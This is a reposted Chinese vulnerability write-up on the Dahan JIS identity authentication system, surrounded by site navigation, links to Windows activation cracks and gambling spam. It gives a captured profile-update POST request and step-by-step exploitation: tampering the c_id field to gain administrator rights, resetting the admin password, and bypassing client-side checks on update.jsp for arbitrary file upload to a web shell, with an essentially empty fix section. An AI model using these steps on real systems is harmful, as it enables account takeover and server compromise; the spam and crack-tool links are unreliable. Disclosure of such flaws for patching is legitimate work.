大汉通版jis统一身份认证系统漏洞打包

时间:2017/11/19来源:sabfilmyhai.com
大汉通版jis统一身份认证系统漏洞打包 - 网站安全 - 红黑联盟 资讯 安全 论坛 下载 读书 系统 网络 qq 考试 频道栏目 | | | | | | 登录注册 首页 > 安全 >       作者:xcoder 收藏   我要投稿 大汉通版jis统一身份认证系统: 在用户修改信息时进行抓包发现 post: http://10.11.5.201:9080/jis/front/upduser_do. content: c_id=00000&vc_loginid=admin&vc_password=123456&vc_pwd=123456&vc_username=系统管理员&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname=  经过验证c_id为权限控制字段,00000为管理员,vc_loginid为登陆名称,vc_password以及 vc_pwd为密码, (1)用户权限提升: 在修改个人信息时进行抓包,将c_id修改成0000,即可提升为系统管理员, (2)重置管理员密码 将c_id改为00000以及将登陆名称vc_loginid改成admin 密码修改为自己的即可 (3)任意文件上传漏洞  上传地址:http://url//jis/update/update.jsp  去掉本地js验证 shell地址:http://10.11.5.201:9080/jis/update/data/上传的文件名 修复方案:控制 点击复制链接 与好友分享! --> 相关tag标签 上一篇:java反射执行系统命令 下一篇:netcms存在存储形xss 相关文章 大汉jis身份认证系统sql注入 技术分享:通过kerberos unconstrain 美国标准实验室(nist):向短信身份认 后https时代:网站身份认证比加密更重 大汉版通jcms内容管理系统sql注射 大汉版通jcms数据库配置文件读取 大汉版通jcms数据库配置文件读取漏洞 大汉版通jvideo系统sql注射 大汉版通系统敏感信息泄露+sql注入漏洞 大汉网络文件读取漏洞+读取管理员密码 热门专题推荐 个人电脑安全 u盘启动工具 小马激活工具 office激活 win7激活工具 图文推荐 局域网怎么预防arp攻 不法分子之怎样利用一 前端跨站脚本攻击安全 网站安全预警!wordp 文章推荐 · win7激活工具oem7(小马win7激活工具)绿 · win10激活码生成器 win10专业版/家庭 · 在word文档中搜索文字的方法技巧 · win7激活工具 小马win7旗舰版激活一键 · win10实用小技巧(去搜索框改小图标小工 · win8.1如何开机启动系统直接进入桌面 · 最新版win10如何生成便利贴 · 双系统开机取消系统选择画面直接进入默 · win7激活工具 · win10激活工具 · win7激活工具旗舰版 · office2010激活密钥 · windows7激活密钥 · office2010激活工具 ·  · win10激活工具 热门新闻 · nsa泄露黑客工具之 fuzzbunch & da · 3个小妙招有效防止服务器遭受ddos攻击 · 这13招教你成为优秀的白帽黑客 · nsa泄露工具中的dander spiritz工具使 · 照着这么做,谁都别想偷走你电脑里的文 · 2017owasp top10十大安全漏洞候选出炉 · 方程式又一波大规模 0day 攻击泄漏, · phpcms v9.6.0 任意文件上传漏洞分析 | | | | | | |vip技术培训 |版权所有: --致力于做实用的it技术学习网站

文章地址:http://sabfilmyhai.com/sow/w1/2cto/c1/Article/201401/274650.html
相关阅读:
    暂无相关文章
六合彩走势图 牛牛赌博 重庆时时彩网上购买 天空彩票wap电脑 新二现金网站 江西时时彩开奖号码 澳门皇冠国际赌场 体育竞彩网 竞彩足球比分预测